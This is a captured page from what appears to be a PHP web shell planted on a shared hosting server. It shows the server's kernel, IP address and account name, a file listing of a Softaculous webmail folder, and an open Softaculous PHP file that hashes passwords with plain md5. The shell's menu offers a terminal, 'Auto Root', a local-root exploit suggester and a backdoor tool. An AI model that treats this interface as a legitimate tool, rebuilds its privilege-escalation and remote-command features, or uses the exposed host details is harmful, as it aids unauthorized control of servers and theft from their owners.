Linux yavrix.internet-webhosting.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 103.8.25.136 & Your IP : 216.73.216.129
Domains :
Cant Read [ /etc/named.conf ]
User : celfico1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
webmail /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-04-14 12:18
php53
[ DIR ]
drwxr-xr-x
2026-04-14 12:18
php56
[ DIR ]
drwxr-xr-x
2026-04-14 12:18
php71
[ DIR ]
drwxr-xr-x
2026-04-14 12:18
php81
[ DIR ]
drwxr-xr-x
2026-04-14 12:18
php82
[ DIR ]
drwxr-xr-x
2026-04-14 12:18
Core.config.json
4.57
KB
-rw-r--r--
2026-04-01 22:59
_edit.php
3.58
KB
-rw-r--r--
2021-12-22 22:54
_edit.xml
433
B
-rw-r--r--
2021-12-22 22:54
_extend.php
1.51
KB
-rw-r--r--
2021-12-22 22:54
changelog.txt
2.35
KB
-rw-r--r--
2026-04-01 22:59
clone.php
4.98
KB
-rw-r--r--
2026-04-13 01:17
config.json
7.13
KB
-rw-r--r--
2025-01-19 20:28
db_init.php
619
B
-rw-r--r--
2021-12-22 22:54
encryption_key.php
8
B
-rw-r--r--
2024-09-18 22:58
fileindex.php
188
B
-rw-r--r--
2025-10-22 20:51
import.php
3.86
KB
-rw-r--r--
2026-04-13 01:17
info.xml
3.9
KB
-rw-r--r--
2026-04-12 22:21
install.js
2.13
KB
-rw-r--r--
2026-04-12 22:21
install.php
6.05
KB
-rw-r--r--
2026-04-13 01:17
install.xml
3.58
KB
-rw-r--r--
2021-12-22 22:54
md5
1.34
KB
-rw-r--r--
2026-04-13 01:17
migrate.php
1.28
KB
-rw-r--r--
2021-12-22 22:54
notes.txt
1.57
KB
-rw-r--r--
2025-07-03 23:00
upgrade.php
5.75
KB
-rw-r--r--
2026-04-13 01:17
upgrade.xml
627
B
-rw-r--r--
2024-09-18 22:58
Save
Rename
<?php ////////////////////////////////////////////////////////////// //=========================================================== // extend.php(For individual softwares) //=========================================================== // SOFTACULOUS // Version : 1.0 // Inspired by the DESIRE to be the BEST OF ALL // ---------------------------------------------------------- // Started by: Alons // Date: 10th Jan 2009 // Time: 21:00 hrs // Site: http://www.softaculous.com/ (SOFTACULOUS) // ---------------------------------------------------------- // Please Read the Terms of use at http://www.softaculous.com // ---------------------------------------------------------- //=========================================================== // (c)Softaculous Inc. //=========================================================== ////////////////////////////////////////////////////////////// if(!defined('SOFTACULOUS')){ die('Hacking Attempt'); } ///////////////////////////////////////// // All functions in this PAGE must begin // with TWO UNDERSCORE '__' to avoid // clashes with SOFTACULOUS Functions // e.g. __softname_funcname() ///////////////////////////////////////// ////////////////////////////////////////// // Note : The path of the upgrade package // is $software['path'].'/' . So to // access other files use // $software['path'].'/other_file.ext' ////////////////////////////////////////// //Change password using old method function __ad_pass_md5($password){ return md5($password); } ?>